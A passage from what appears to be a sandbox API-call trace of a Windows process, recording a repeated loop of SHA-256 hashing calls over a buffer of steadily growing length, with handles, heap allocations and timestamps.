(hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.432] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.435] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.435] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0179.436] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6db00 [0179.436] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6db00, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6db00, pdwDataLen=0xcdf6c) returned 1 [0179.436] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.436] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.436] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0179.436] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.436] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0179.436] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d020 [0179.436] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d020, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d020, pdwDataLen=0xcdf6c) returned 1 [0179.437] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.437] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.437] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.437] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.437] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0179.437] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.437] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d530 [0179.437] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d530, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d530, pdwDataLen=0xcdf6c) returned 1 [0179.438] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.438] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.438] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.438] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.438] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0179.438] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.438] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d5c0 [0179.438] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d5c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d5c0, pdwDataLen=0xcdf6c) returned 1 [0179.438] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.438] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.439] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.439] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.439] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0179.439] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d620 [0179.439] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d620, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d620, pdwDataLen=0xcdf6c) returned 1 [0179.439] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.439] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.440] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.440] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.440] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0179.440] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.440] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d6e0 [0179.440] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d6e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d6e0, pdwDataLen=0xcdf6c) returned 1 [0179.440] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.440] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.440] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.441] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.441] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0179.441] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.441] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6def0 [0179.441] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6def0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6def0, pdwDataLen=0xcdf6c) returned 1 [0179.441] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.441] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.441] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0179.442] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.442] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0179.442] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e2b0 [0179.442] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e2b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e2b0, pdwDataLen=0xcdf6c) returned 1 [0179.442] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.442] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0179.442] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.443] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.443] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0179.443] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.443] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6db60 [0179.443] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6db60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6db60, pdwDataLen=0xcdf6c) returned 1 [0179.443] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.443] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.443] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.444] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.444] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0179.444] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.444] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dc80 [0179.444] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dc80, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dc80, pdwDataLen=0xcdf6c) returned 1 [0179.444] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.444] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.444] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.445] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.445] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0179.445] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.445] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dc50 [0179.445] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dc50, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dc50, pdwDataLen=0xcdf6c) returned 1 [0179.446] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.446] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.446] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.446] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.447] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0179.447] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.447] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e550 [0179.447] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6e550, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e550, pdwDataLen=0xcdf6c) returned 1 [0179.447] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.447] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.447] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0179.448] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.448] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0179.448] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.448] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e580 [0179.449] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e580, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e580, pdwDataLen=0xcdf6c) returned 1 [0179.449] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.449] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0179.449] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.449] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.450] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0179.450] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e730 [0179.450] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e730, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e730, pdwDataLen=0xcdf6c) returned 1 [0179.450] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.450] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.450] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0179.451] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.451] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0179.451] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e2e0 [0179.451] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e2e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e2e0, pdwDataLen=0xcdf6c) returned 1 [0179.451] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.451] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0179.451] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.452] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.452] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0179.452] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e5b0 [0179.452] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e5b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e5b0, pdwDataLen=0xcdf6c) returned 1 [0179.452] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.452] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.452] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0179.453] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.453] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0179.453] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e040 [0179.453] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e040, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e040, pdwDataLen=0xcdf6c) returned 1 [0179.453] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.453] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0179.454] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.454] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.454] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0179.454] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dd40 [0179.455] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dd40, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dd40, pdwDataLen=0xcdf6c) returned 1 [0179.455] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.455] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.455] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.455] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.456] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0179.456] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e0a0 [0179.456] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e0a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e0a0, pdwDataLen=0xcdf6c) returned 1 [0179.456] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.456] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.456] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.457] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.457] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0179.457] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6db90 [0179.457] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6db90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6db90, pdwDataLen=0xcdf6c) returned 1 [0179.457] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.457] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.457] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.458] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.458] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0179.458] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e670 [0179.458] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e670, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e670, pdwDataLen=0xcdf6c) returned 1 [0179.458] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.458] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.458] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.458] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.458] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0179.458] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6df20 [0179.458] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6df20, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6df20, pdwDataLen=0xcdf6c) returned 1 [0179.459] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.459] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.459] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.459] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.459] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0179.459] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6de60 [0179.459] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6de60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6de60, pdwDataLen=0xcdf6c) returned 1 [0179.459] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.459] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.459] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.460] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.460] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0179.460] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e520 [0179.460] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e520, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e520, pdwDataLen=0xcdf6c) returned 1 [0179.460] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.460] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.460] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.460] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.460] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0179.460] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.460] RtlAllocateHeap 